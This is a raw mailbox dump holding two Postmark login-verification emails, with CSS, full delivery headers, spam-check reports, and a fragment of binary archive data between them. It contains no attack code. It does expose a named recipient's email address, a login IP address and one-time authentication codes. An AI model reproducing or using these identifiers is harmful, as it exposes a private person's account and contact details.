} .panel--warning .panel_body { color: #ffd6ba !important; } .panel--error { border-color: #483737 !important; background-color: #2e2222 !important; } .panel--success { border-color: #3d5332 !important; background-color: #2d302c !important; } .panel--info { border-color: #2c3d46 !important; background-color: #131d23 !important; } .panel_title { color: #ececec !important; } .digest-server { color: #ececec !important; } .digest-summary { background-color: #272727 !important; } .digest-summary--border { border-top-color: #5a5a5a !important; } .digest-summary_item { border-right-color: #5a5a5a !important; } .digest-section { background-color: #272727 !important; } .digest-key_label .activity-link { color: #ececec !important; } .hero { filter: brightness(.9) !important; } } @media screen and (max-width:599px) { pre { width: 230px; } .email-top { display: none !important; } .email-body_inner { width: 100% !important; } .email-footer { width: 100% !important; } .welcome { padding: 30px 30px 10px !important; } .divider { padding: 20px 30px !important; } .divider_image--desktop { display: none; } .divider_image--mobile { display: block !important; height: auto !important; max-height: none !i= mportant; font-size: 16px !important; } .divider--thick { padding: 20px 0 !important; } .divider--no-padding { padding-top: 0 !important; } .divider--no-pad-bottom { padding-bottom: 0 !important; } .divider--no-padding { padding-bottom: 0 !important; } .content-block { padding: 20px 30px !important; } .content-block--image { padding-top: 0 !important; padding-bottom: 0 !important; } .content-block_image-container { text-align: center; } .content-block_body-container { width: 100%; } .content-block_image-container { width: 100%; } .content-block--small .content-block_title { margin-top: 16px !important; } .cta-banner { padding: 30px; } .cta-banner_logo { text-align: center !important; } .cta-banner_sub-title { text-align: center !important; } .cta-banner_title { text-align: center !important; } .cta-banner_action { width: 100%; } .cta-banner_body { width: 100%; } .cta-banner_action { text-align: center !important; } .cta-banner_action td { text-align: center !important; } .cta-banner--centered .cta-banner_action td { text-align: center; } .footer { padding: 0 30px !important; } .footer_table { width: 100%; } .footer--slim { padding: 16px 30px !important; } .follow-banner { padding: 15px 30px !important; } .follow-banner_links { width: 100%; text-align: center !important; } .follow-banner_logo { width: 100%; text-align: center !important; } .follow-banner_logo { margin-bottom: 20px; } .follow-banner_links td { text-align: center !important; } .follow-banner_logo td { text-align: center !important; } .follow-banner_links span { display: block; } .header--digest .header_logo { padding-top: 0 !important; padding-bottom: 12px; text-align: center !im= portant; } .header_block { width: 100% !important; } .panel--inline .panel_col { width: 100% !important; } .panel--inline .panel_actions .btn { display: block !important; margin-top: 10px; } .digest-server { text-align: center !important; } .digest-date { text-align: center !important; } .digest-summary { padding-right: 30px !important; padding-left: 30px !important; } .digest-summary_item { width: 100% !important; border-right: 0 !important; padding-bottom: 20p= x !important; } .digest-summary_item td { padding-right: 0 !important; padding-bottom: 20px !important; padding-l= eft: 0 !important; } .digest-summary_item:last-child td { padding-bottom: 0 !important; } .digest-section { padding-right: 30px !important; padding-left: 30px !important; } .digest-key_item { width: 100% !important; } .digest-section-header_title { width: 100%; } .digest-section-header_actions { width: 100%; text-align: left !important; } .hero { padding: 10px 30px 0 !important; } } @media only screen and (max-device-width:480px) { body { -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } } </style> </head> <body class=3D"postmark" style=3D"width: 100% !important; height: 100%; b= ackground-color: #eeece4; color: #272727; line-height: 1.6; -webkit-text-si= ze-adjust: none; margin: 0;"> <span class=3D"preheader" style=3D"display: none !important; max-width:= 0; max-height: 0; overflow: hidden; visibility: hidden; opacity: 0; font-s= ize: 1px; line-height: 1px; mso-hide: all;">Someone just tried to access yo= ur Postmark account and we want to make sure it=E2=80=99s you.</span> <table class=3D"email-wrapper" width=3D"100%" cellpadding=3D"0" cellspa= cing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; mso-tab= le-rspace: 0; -premailer-width: 100%; width: 100%; -premailer-cellpadding: = 0; -premailer-cellspacing: 0; background-color: #eeece4; margin: 0; padding= : 0;"> <tr> <td align=3D"center" style=3D"font-family: Helvetica Neue,Helvetica= ,Arial,sans-serif;"> <table class=3D"email-content" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; m= so-table-rspace: 0; width: 100%; margin: 0; padding: 0;"> <tr> <td class=3D"email-top" width=3D"100%" cellpadding=3D"5" cell= spacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-ser= if; padding: 20px 0;"> <table class=3D"email-top_inner" align=3D"center" width=3D"= 600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse= ; mso-table-lspace: 0; mso-table-rspace: 0;"> <tr><td class=3D"email-top_content" style=3D"font-family:= Helvetica Neue,Helvetica,Arial,sans-serif; font-size: 12px; color: #b0aea7= ; text-align: center;"></td></tr> </table> </td> </tr> <tr> <td class=3D"email-body" width=3D"100%" cellpadding=3D"0" cel= lspacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-se= rif;"> <table class=3D"email-body_inner" align=3D"center" width=3D= "600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collaps= e; mso-table-lspace: 0; mso-table-rspace: 0; width: 600px; background-color= : #fff;"> <tr> <td class=3D"header header--filled" style=3D"font-family: Helvetica Neue,= Helvetica,Arial,sans-serif; background-color: #ffde00; text-align: center; = padding: 30px 0;"> <a href=3D"https://postmarkapp.com" style=3D"font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; color: #007bc8; text-decoration: underline;"> <img label=3D"Logo" src=3D"https://newsletter.postmarkapp.com/assets/= images/pm_logo@2x.png" width=3D"200" alt=3D"ActiveCampaign Postmark" style=3D= "margin-left: -27px; vertical-align: middle; border-style: none;"> </a> </td> </tr> <tr> <td class=3D"welcome" style=3D"font-family: Helvetica Neue,Helvetica,Aria= l,sans-serif; background-color: #fff; padding: 50px 50px 20px;"> =20 <p class=3D"welcome_greeting" style=3D"font-family: Helvetica Neue,Helvet= ica,Arial,sans-serif; line-height: 22px; text-align: left; margin-top: 0; f= ont-size: 21px; margin-bottom: 25px; color: #404040; font-weight: 700;">Hi = Rudolph.Perry,</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">We noticed someone just tried to log in to your = Postmark account. If this was you, please use the following code to confirm= it:</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"><code class=3D"one-time-code" style=3D"font-fami= ly: Andale Mono,Lucida Console,Courier,monospace,serif; color: #000; font-s= ize: 32px; letter-spacing: .1em;">371198</code></p> <p class=3D"sub" style=3D"font-family: Helvetica Neue,Helvetica,Arial,san= s-serif; line-height: 22px; text-align: left; margin-top: 0; font-size: 12p= x; margin-bottom: 25px; color: #404040;">This code is valid for 10 minutes.= </p> <div class=3D"panel panel--info" style=3D"margin-bottom: 30px; border-rad= ius: 4px; background-color: #f5fafd; text-align: center; padding: 15px; bor= der: 1px solid #deeef8;"> <h3 class=3D"panel_title panel_title--s" style=3D"font-family: Helvetic= a Neue,Helvetica,Arial,sans-serif; color: #272727; font-weight: 700; font-s= ize: 14px; text-align: left; margin: 0 0 .6em;">Login details:</h3> <ul class=3D"panel_body bulletless" style=3D"font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; line-height: 1.6; text-align: left; font-size= : 14px; padding-left: 0; list-style-type: none; color: #5a5a5a; margin: 0;"= > <li style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; = line-height: 1.6; text-align: left; font-size: 14px; color: #404040;"> <strong style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-s= erif;">Time:</strong> <time datetime=3D"2024-10-16T07:18:39Z">2024-10-16 07:18:39 UTC</ti= me> </li> <li style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; = line-height: 1.6; text-align: left; font-size: 14px; color: #404040;"> <strong style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-s= erif;">IP:</strong> <code style=3D"font-family: Andale Mono,Lucida Console,Courier,mono= space,serif;">223.233.69.100</code> </li> </ul> </div> <h2 style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; marg= in-top: 0; color: #272727; font-weight: 700; text-align: left; font-size: 1= 6px;">Don=E2=80=99t recognize this activity?</h2> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">If you didn=E2=80=99t initiate the login above, = please <a href=3D"https://account.postmarkapp.com/password_resets/new" styl= e=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #007bc8= ; text-decoration: underline;">change your password</a> immediately and <a = href=3D"https://postmarkapp.com/support/article/1081-how-do-i-use-two-facto= r-authentication-2fa" style=3D"font-family: Helvetica Neue,Helvetica,Arial,= sans-serif; color: #007bc8; text-decoration: underline;">turn on two-factor= authentication</a> on your account.</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"><a class=3D"btn" href=3D"https://account.postmar= kapp.com/password_resets/new" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; color: #fff; text-decoration: none; background-color: #= 007bc8; font-size: 14px; display: inline-block; height: auto; border-radius= : 3px; font-weight: 700; text-align: center; -webkit-text-size-adjust: none= ; border-color: #007bc8; border-style: solid; border-width: 10px 18px;">Cha= nge your password</a></p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">If you need any help, just reply to this email.<= /p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"> Thanks, <br>The Postmark Team <br><a href=3D"mailto:support@postmarkapp.com" style=3D"font-family: He= lvetica Neue,Helvetica,Arial,sans-serif; color: #007bc8; text-decoration: u= nderline;">support@postmarkapp.com</a> </p> </td> </tr> <tr> <td class=3D"follow-banner" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; background-color: #ffde00; padding: 15px 50px;"> <table class=3D"follow-banner_links" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" align=3D"right" valign=3D"middle" style=3D"border-collapse= : collapse; mso-table-lspace: 0; mso-table-rspace: 0; font-size: 14px; text= -align: center;"> <tr> <td class=3D"align-center" style=3D"font-family: Helvetica Neue,Hel= vetica,Arial,sans-serif; text-align: center;"> <span>Follow us on</span> <img src=3D"https://newsletter.postmark= app.com/assets/images/twitter-dark@2x.png" alt=3D"Twitter Logo" width=3D"18= " height=3D"15" style=3D"margin-bottom: -3px;"> <a href=3D"https://twitter.= com/postmarkapp" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-= serif; color: #272727; text-decoration: underline;">Twitter</a> and <img sr= c=3D"https://newsletter.postmarkapp.com/assets/images/linkedin-dark@2x.png"= alt=3D"LinekdIn Logo" width=3D"15" height=3D"15" style=3D"margin-bottom: -= 3px;"> <a href=3D"https://www.linkedin.com/company/postmarkapp" style=3D"fo= nt-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #272727; text-= decoration: underline;">LinkedIn</a> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer" style=3D"font-family: Helvetica Neue,Helvetica,Arial= ,sans-serif; font-size: 14px; background-color: #3b4049; color: #fff; paddi= ng: 0 50px;"> <p style=3D"color: #FFF; text-align: center; font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; line-height: 22px; font-size: 14px; margin: 1= 2px 0;">=F0=9F=92=8C <a href=3D"https://postmarkapp.com/newsletter" style=3D"color: rgba(2= 55, 255,255, .5); font-family: Helvetica Neue,Helvetica,Arial,sans-serif; t= ext-decoration: underline;">Subscribe to the Postmark newsletter</a> </p> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer footer--slim" style=3D"font-family: Helve= tica Neue,Helvetica,Arial,sans-serif; font-size: 14px; background-color: #e= eece4; color: #fff; border-top-width: 0; padding: 16px 50px;"> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,san= s-serif; line-height: 22px; text-align: center; font-size: 14px; color: #b0= aea7; margin: 0;"><a href=3D"https://www.activecampaign.com/?utm_source=3Dp= ostmark&utm_medium=3Demail" target=3D"_blank" style=3D"font-family: Hel= vetica Neue,Helvetica,Arial,sans-serif; color: #b0aea7; text-decoration: un= derline;">ActiveCampaign</a> LLC, 1 North Dearborn St, 5th Floor, Chicago, = IL 60602</p> </td> </tr> </table> </td> </tr> </table> </body> </html> --mk3-570f04f0730748b99d196381d7f6d509-- PK }��Y���\^ \^ B 1729063581.M58272P1734023.mgh-web11.maghost.ro,S=24156,W=24849:2,Snu ��٘� Return-Path: <pm_bounces@pmbounces.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id IIA5A51qD2eHdRoAJwI5NA (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Wed, 16 Oct 2024 10:26:21 +0300 Return-path: <pm_bounces@pmbounces.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Wed, 16 Oct 2024 10:26:21 +0300 Received: from sc-ord-mta116.mtasv.net ([50.31.156.116]:36556) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) id 1t0yQG-00000007IQ6-18dH for rudolph.perry@bloomingcostamices.com; Wed, 16 Oct 2024 10:26:20 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=pm20241004; d=pm.mtasv.net; h=From:Date:Subject:To:Message-Id:MIME-Version:Content-Type:Date:From: Message-ID:Reply-To:Sender:Subject:To:CC; t=1729063578; x=1729149978; bh=P00pLpccI/1WgI/YGZ1oUQJQZAQatSbQ/rD5kfkVzE0=; b=jkJm6cvzusbyVpBy8hBbo11KVT6nPi41ntDLRk0Diw7mNthkOeLVV40o/CBjPcNUhmEdLpYR0JjG YD7BscUP2oFAGBLz03DE/kSXIU5bcTppf5Lcdx55p4LimF1TzzwOQKRUZG5muSB28pc0X2ZSZcUF lK8MzoeKoL1+opY9SwI3PoTqueiQCyq7LNWWIlQEpQTK7E/VVc92Na9umek+B5HUDHM5ECCnNjQk xcDXr61hHq5O6NMSIAz30RZaJoDA2v4x0Od7F66B5ivVSssdqu2cNjrgoNPYUDrkyR16lI87iEVT dC0MYSc7r1vQv3+iPAUDAUpc24JOgxypOuz5BQ== Received: by sc-ord-mta116.mtasv.net id h1tl723864oc for <rudolph.perry@bloomingcostamices.com>; Wed, 16 Oct 2024 03:25:37 -0400 (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) X-PM-IP: 50.31.156.116 X-IADB-IP: 50.31.156.116 X-IADB-IP-REVERSE: 116.156.31.50 DKIM-Signature: v=1; a=rsa-sha256; d=postmarkapp.com; s=20240110170422pm; c=relaxed/relaxed; i=support@postmarkapp.com; t=1729063537; x=1729236337; h=date:date:from:from:message-id:reply-to:sender:subject:subject:to:to:cc: feedback-id:mime-version:content-type; bh=P00pLpccI/1WgI/YGZ1oUQJQZAQatSbQ/rD5kfkVzE0=; b=cJwik46Kj5Y3t9rZ0UYTAZyQiGWFk7AcMd5krcczaEXB/4vuoqG7ul54R/Zq/ixkt7ZC+4hxxiT Vad4OP3wGViS68HkTEscscqUTQ1Pw1gdB8UxooqOS9Xp8Hn6owgfdjqJ+Biaumg2LpxUGe+e+gHVe mxZd4zYMViRTsB/qSsc= From: Postmark <support@postmarkapp.com> Date: Wed, 16 Oct 2024 07:25:37 +0000 Subject: Your Postmark verification code is 075695 To: rudolph.perry@bloomingcostamices.com Message-Id: <670f6a712b87c_45e020a5875883@ip-172-26-21-162.us-east-2.compute.internal.mail> Feedback-ID: s40483-bG9naW4tdmVyaWZpY2F0aW9uLWNvZGU=:s40483:a50355:postmark X-Complaints-To: abuse@postmarkapp.com X-PM-Message-Id: 915a5bfa-3558-489f-9c62-8c7444044e42 X-PM-Tag: login-verification-code X-PM-RCPT: |bTB8NTAzNTV8NDA0ODN8cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29t| X-PM-Message-Options: v1;1.mUQNr-iJBbzUmV5MNNSdEQ.KURVsmBX6jMkVcioopbvaX8ms3zs3V6m1HckNcJAmaqupoPCcSy_rZe0ECqyWL8W4BgJO67D5sBljWp9mwLQWaS7FH7uKqz8qGNbIZlv3KgN7RSz3S-SD2E7Wvz4zmZoaSLsmHIsM2crl49pn77qG9_42aPz2iUt89LbKisHDKLVjzfI3G4_zmP3QunU62eHdFxRDOCW7XKLBxA6GIYJhw MIME-Version: 1.0 X-PM-MTA-Pool: transactional-1 Content-Type: multipart/alternative; boundary=mk3-d0acfd60b4bb440d84b8716f9d75d707; charset=UTF-8 X-Spam-Status: No, score=0.3 X-Spam-Score: 3 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Hi Rudolph.Perry, We noticed someone just tried to log in to your Postmark account. If this was you, please use the following code to confirm it: 075695 Content analysis details: (0.3 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_HELO_PASS SPF: HELO matches SPF record -0.0 SPF_PASS SPF: sender matches SPF record 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.0 HTML_MESSAGE BODY: HTML included in message 0.5 KAM_NUMSUBJECT Subject ends in numbers excluding current years -0.1 DKIMWL_WL_HIGH DKIMwl.org - High trust sender X-Spam-Flag: NO --mk3-d0acfd60b4bb440d84b8716f9d75d707 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Hi Rudolph.Perry, We noticed someone just tried to log in to your Postmark account. If this w= as you, please use the following code to confirm it: 075695 This code is valid for 10 minutes. LOGIN DETAILS: * Time: 2024-10-16 09:25:36 +0200 * IP: 223.233.69.100 --- DON=E2=80=99T RECOGNIZE THIS ACTIVITY? If you didn=E2=80=99t initiate the login above, please change your password= immediately: https://account.postmarkapp.com/password_resets/new Turn on two-factor authentication on your account: https://postmarkapp.com/support/article/1081-how-do-i-use-two-factor-authen= tication-2fa If you need any help, just reply to this email. Postmark Team https://postmarkapp.com/support Follow us for the latest updates: http://twitter.com/postmarkapp --mk3-d0acfd60b4bb440d84b8716f9d75d707 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.= w3.org/TR/html4/loose.dtd"> <html lang=3D"en" style=3D"color-scheme: light dark; supported-color-scheme= s: light dark;"> <head> <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D= 1.0"> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8"> <meta name=3D"x-apple-disable-message-reformatting"> <meta name=3D"color-scheme" content=3D"light dark"> <meta name=3D"supported-color-schemes" content=3D"light dark"> =20 =20 <style>.ExternalClass { width: 100%; } .ExternalClass { line-height: 100%; } body { width: 100% !important; height: 100%; margin: 0; background-color: #eeece4;= color: #272727; line-height: 1.6; -webkit-text-size-adjust: none; } a:visited { color: #007bc8; text-decoration: underline; } a:visited img { border: none; } .btn:visited { border-color: #007bc8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #007bc8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #fff; font-weight: 700; text-align: center; text= -decoration: none; -webkit-text-size-adjust: none; } .btn:visited--s { border-width: 5px 9px; } .btn--ghost:visited { border-color: #deeef8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #deeef8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #007bc8; text-align: center; text-decoration: no= ne; -webkit-text-size-adjust: none; } .footer--slim a:visited { color: #b0aea7; } .follow-banner a:visited { color: #272727; } .digest a:hover { color: #000 !important; } @media screen and (prefers-color-scheme:dark) { body { background-color: #111 !important; } .spacer { background-color: #272727 !important; color: transparent !important; } .txt-warning { color: #fa9552 !important; } .txt-danger { color: #fb9186 !important; } .email-wrapper { background-color: #111 !important; } .btn { color: #ececec !important; } .btn:visited { color: #ececec !important; } h1 { color: #fff !important; } h2 { color: #fff !important; } h3 { color: #fff !important; } li { color: #ececec !important; } ol { color: #ececec !important; } p { color: #ececec !important; } ul { color: #ececec !important; } .one-time-code { color: #fff !important; } .welcome { background-color: #272727 !important; } .divider_line { border-color: #5a5a5a !important; } .divider { background-color: #272727 !important; } .purchase { border-color: #5a5a5a !important; } .purchase td { border-color: #5a5a5a !important; } .cta-banner--dmarcdigests { border-top-color: #5a5a5a !important; } .cta-banner { background-color: #272727 !important; } .footer { background-color: #111 !important; } .footer--slim p { color: #5a5a5a !important; } .footer--slim a { color: #5a5a5a !important; } .footer--slim a:visited { color: #5a5a5a !important; } .follow-banner { filter: brightness(.9) !important; } .header--filled { filter: brightness(.9) !important; } .header--error { background-color: #ffb3aa !important; } .header--digest { border-bottom-color: #5a5a5a !important; background-color: #272727 !imp= ortant; } .header--digest .header_logo img { filter: invert(1) !important; } .panel--warning { border-color: #847450 !important; background: #34311a !important; } .panel--warning .panel_body { color: #ffd6ba !important; } .panel--error { border-color: #483737 !important; background-color: #2e2222 !important; } .panel--success { border-color: #3d5332 !important; background-color: #2d302c !important; } .panel--info { border-color: #2c3d46 !important; background-color: #131d23 !important; } .panel_title { color: #ececec !important; } .digest-server { color: #ececec !important; } .digest-summary { background-color: #272727 !important; } .digest-summary--border { border-top-color: #5a5a5a !important; } .digest-summary_item { border-right-color: #5a5a5a !important; } .digest-section { background-color: #272727 !important; } .digest-key_label .activity-link { color: #ececec !important; } .hero { filter: brightness(.9) !important; } } @media screen and (max-width:599px) { pre { width: 230px; } .email-top { display: none !important; } .email-body_inner { width: 100% !important; } .email-footer { width: 100% !important; } .welcome { padding: 30px 30px 10px !important; } .divider { padding: 20px 30px !important; } .divider_image--desktop { display: none; } .divider_image--mobile { display: block !important; height: auto !important; max-height: none !i= mportant; font-size: 16px !important; } .divider--thick { padding: 20px 0 !important; } .divider--no-padding { padding-top: 0 !important; } .divider--no-pad-bottom { padding-bottom: 0 !important; } .divider--no-padding { padding-bottom: 0 !important; } .content-block { padding: 20px 30px !important; } .content-block--image { padding-top: 0 !important; padding-bottom: 0 !important; } .content-block_image-container { text-align: center; } .content-block_body-container { width: 100%; } .content-block_image-container { width: 100%; } .content-block--small .content-block_title { margin-top: 16px !important; } .cta-banner { padding: 30px; } .cta-banner_logo { text-align: center !important; } .cta-banner_sub-title { text-align: center !important; } .cta-banner_title { text-align: center !important; } .cta-banner_action { width: 100%; } .cta-banner_body { width: 100%; } .cta-banner_action { text-align: center !important; } .cta-banner_action td { text-align: center !important; } .cta-banner--centered .cta-banner_action td { text-align: center; } .footer { padding: 0 30px !important; } .footer_table { width: 100%; } .footer--slim { padding: 16px 30px !important; } .follow-banner { padding: 15px 30px !important; } .follow-banner_links { width: 100%; text-align: center !important; } .follow-banner_logo { width: 100%; text-align: center !important; } .follow-banner_logo { margin-bottom: 20px; } .follow-banner_links td { text-align: center !important; } .follow-banner_logo td { text-align: center !important; } .follow-banner_links span { display: block; } .header--digest .header_logo { padding-top: 0 !important; padding-bottom: 12px; text-align: center !im= portant; } .header_block { width: 100% !important; } .panel--inline .panel_col { width: 100% !important; } .panel--inline .panel_actions .btn { display: block !important; margin-top: 10px; } .digest-server { text-align: center !important; } .digest-date { text-align: center !important; } .digest-summary { padding-right: 30px !important; padding-left: 30px !important; } .digest-summary_item { width: 100% !important; border-right: 0 !important; padding-bottom: 20p= x !important; } .digest-summary_item td { padding-right: 0 !important; padding-bottom: 20px !important; padding-l= eft: 0 !important; } .digest-summary_item:last-child td { padding-bottom: 0 !important; } .digest-section { padding-right: 30px !important; padding-left: 30px !important; } .digest-key_item { width: 100% !important; } .digest-section-header_title { width: 100%; } .digest-section-header_actions { width: 100%; text-align: left !important; } .hero { padding: 10px 30px 0 !important; } } @media only screen and (max-device-width:480px) { body { -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } } </style> </head> <body class=3D"postmark" style=3D"width: 100% !important; height: 100%; b= ackground-color: #eeece4; color: #272727; line-height: 1.6; -webkit-text-si= ze-adjust: none; margin: 0;"> <span class=3D"preheader" style=3D"display: none !important; max-width:= 0; max-height: 0; overflow: hidden; visibility: hidden; opacity: 0; font-s= ize: 1px; line-height: 1px; mso-hide: all;">Someone just tried to access yo= ur Postmark account and we want to make sure it=E2=80=99s you.</span> <table class=3D"email-wrapper" width=3D"100%" cellpadding=3D"0" cellspa= cing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; mso-tab= le-rspace: 0; -premailer-width: 100%; width: 100%; -premailer-cellpadding: = 0; -premailer-cellspacing: 0; background-color: #eeece4; margin: 0; padding= : 0;"> <tr> <td align=3D"center" style=3D"font-family: Helvetica Neue,Helvetica= ,Arial,sans-serif;"> <table class=3D"email-content" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; m= so-table-rspace: 0; width: 100%; margin: 0; padding: 0;"> <tr> <td class=3D"email-top" width=3D"100%" cellpadding=3D"5" cell= spacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-ser= if; padding: 20px 0;"> <table class=3D"email-top_inner" align=3D"center" width=3D"= 600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse= ; mso-table-lspace: 0; mso-table-rspace: 0;"> <tr><td class=3D"email-top_content" style=3D"font-family:= Helvetica Neue,Helvetica,Arial,sans-serif; font-size: 12px; color: #b0aea7= ; text-align: center;"></td></tr> </table> </td> </tr> <tr> <td class=3D"email-body" width=3D"100%" cellpadding=3D"0" cel= lspacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-se= rif;"> <table class=3D"email-body_inner" align=3D"center" width=3D= "600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collaps= e; mso-table-lspace: 0; mso-table-rspace: 0; width: 600px; background-color= : #fff;"> <tr> <td class=3D"header header--filled" style=3D"font-family: Helvetica Neue,= Helvetica,Arial,sans-serif; background-color: #ffde00; text-align: center; = padding: 30px 0;"> <a href=3D"https://postmarkapp.com" style=3D"font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; color: #007bc8; text-decoration: underline;"> <img label=3D"Logo" src=3D"https://newsletter.postmarkapp.com/assets/= images/pm_logo@2x.png" width=3D"200" alt=3D"ActiveCampaign Postmark" style=3D= "margin-left: -27px; vertical-align: middle; border-style: none;"> </a> </td> </tr> <tr> <td class=3D"welcome" style=3D"font-family: Helvetica Neue,Helvetica,Aria= l,sans-serif; background-color: #fff; padding: 50px 50px 20px;"> =20 <p class=3D"welcome_greeting" style=3D"font-family: Helvetica Neue,Helvet= ica,Arial,sans-serif; line-height: 22px; text-align: left; margin-top: 0; f= ont-size: 21px; margin-bottom: 25px; color: #404040; font-weight: 700;">Hi = Rudolph.Perry,</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">We noticed someone just tried to log in to your = Postmark account. If this was you, please use the following code to confirm= it:</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"><code class=3D"one-time-code" style=3D"font-fami= ly: Andale Mono,Lucida Console,Courier,monospace,serif; color: #000; font-s= ize: 32px; letter-spacing: .1em;">075695</code></p> <p class=3D"sub" style=3D"font-family: Helvetica Neue,Helvetica,Arial,san= s-serif; line-height: 22px; text-align: left; margin-top: 0; font-size: 12p= x; margin-bottom: 25px; color: #404040;">This code is valid for 10 minutes.= </p> <div class=3D"panel panel--info" style=3D"margin-bottom: 30px; border-rad= ius: 4px; background-color: #f5fafd; text-align: center; padding: 15px; bor= der: 1px solid #deeef8;"> <h3 class=3D"panel_title panel_title--s" style=3D"font-family: Helvetic= a Neue,Helvetica,Arial,sans-serif; color: #272727; font-weight: 700; font-s= ize: 14px; text-align: left; margin: 0 0 .6em;">Login details:</h3> <ul class=3D"panel_body bulletless" style=3D"font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; line-height: 1.6; text-align: left; font-size= : 14px; padding-left: 0; list-style-type: none; color: #5a5a5a; margin: 0;"= > <li style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; = line-height: 1.6; text-align: left; font-size: 14px; color: #404040;"> <strong style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-s= erif;">Time:</strong> <time datetime=3D"2024-10-16T09:25:36+02:00">2024-10-16 09:25:36 +0= 200</time> </li> <li style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; = line-height: 1.6; text-align: left; font-size: 14px; color: #404040;"> <strong style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-s= erif;">IP:</strong> <code style=3D"font-family: Andale Mono,Lucida Console,Courier,mono= space,serif;">223.233.69.100</code> </li> </ul> </div> <h2 style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; marg= in-top: 0; color: #272727; font-weight: 700; text-align: left; font-size: 1= 6px;">Don=E2=80=99t recognize this activity?</h2> <p style=3D"font-family: Helvetica 